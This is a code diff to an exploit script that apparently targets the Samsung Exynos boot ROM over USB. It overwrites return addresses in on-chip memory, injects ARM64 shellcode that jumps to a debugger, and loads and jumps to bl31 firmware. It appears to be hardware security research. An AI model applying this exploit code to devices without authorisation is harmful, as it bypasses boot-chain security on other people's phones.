usb stack likely not executable

source/exploit/exploit.py

@@ -78,6 +78,9 @@ class ExynosDevice():
                 sys.exit(0)
             else:
                 raise e
+
+        # claim usb interface
+        self.handle.claimInterface(0)
         print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
 
     def write(self, data):
@@ -356,6 +359,9 @@ class ExynosDevice():
         # Try loading bl1
         bl1 = open("../S7/bl1.bin", "rb").read()
 
+        # Using keystone, look for each msr instruction (AARCH64, LE)
+    
+
         # If wanting to modify the binary
         # bl1 = bl1[:0x1C23] + b'\xaa' + bl1[0x1C24:]
 
@@ -383,9 +389,7 @@ class ExynosDevice():
         
         # Overwrite jump back to the debugger from functions encountered during jump_bl1
         # self.cd.memwrite_region(0x02020108, p32(0x020c0000)) # Hijack some weird function, original 0x00005790
-
+        self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
-        # 
-        self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger, at function
         self.cd.memwrite_region(0x020200dc, p32(0x020c0000))
         
         def hijack_brom_weird():
@@ -400,54 +404,40 @@ class ExynosDevice():
         jump_bl1(0x020c0000)
         while True:
             try:
-                logging.debug(f'Within jump_bl1')
                 resp = self.usb_read(0x200)
+                logging.debug(f'Within jump_bl1. Response: {resp}.')
                 if self.cd.arch_dbg.state.LR == 0x02022948:
                     break # ROM will load next stage over USB
                 hijack_brom_weird()
             except:
                 pass
+
+        shellcode = f"""
+        ldr x0, debugger_addr
+        blr x0
+        debugger_addr:   .quad 0x020c0000
+        """
+
+        shellcode = ks.asm(shellcode, as_bytes=True)[0]
+        self.cd.memwrite_region(0x2021800, shellcode)
+
+        self.cd.jump_to(0x2021800)
+        pass
+
         
-        # TODO load bl31
+        # load bl31
         bl31 = open("../S7/bl31.bin", "rb").read()
-        bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:]
+        # bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
-
-        # Write 0's to 0x02021800 to 0x0206ffff. Except for debugger location, at: 0x020c0000 to 0x020c6000
-        self.cd.memwrite_region(0x02021800, b"\x00" * 0x4E800)
 
+        # # Write bl31 at 0x02021800 and authenticate
         self.cd.memwrite_region(0x02021800, bl31)
-        
-        imem_bl31_pre_auth = memdump_imem()
-        with open("/tmp/imem_bl31_pre_auth.bin", "wb") as f:
-            f.write(imem_bl31_pre_auth)
-
         auth_bl1(0x020c0000)
 
-        imem_bl31_post_auth = memdump_imem()
+        # Jump to bl31
-        with open("/tmp/imem_bl31_post_auth.bin", "wb") as f:
+        jump_bl1(0x02021800)
-            f.write(imem_bl31_post_auth)
-
-        # TEST JONATHAN
-        self.cd.jump_to(0x02021800)
-        self.cd.memwrite_region(0x020200e8, p32(0x020c0000))
-        self.cd.memwrite_region(0x020200dc, p32(0x020c0000))
-
-        # Patch bl31
-        # self.cd.jump_to(0x2069000)
-        # self.cd.memwrite_region(0x02021800 + 0x14, self.cd.arch_dbg.sc.branch_absolute(0x2069000))
-        # jump_bl1(0x2069000)
-        self.cd.jump_to(0x02021800 + 0x14)
         pass
-        
 
-
+        # OLD
-
-
-
-        
-        # Overwrite jump back
-        self.cd.memwrite_region(0x020200e8, p32(0x2069000))
-        
         
         def memdump_try():
             self.cd.arch_dbg.state.LR = 0x020200e8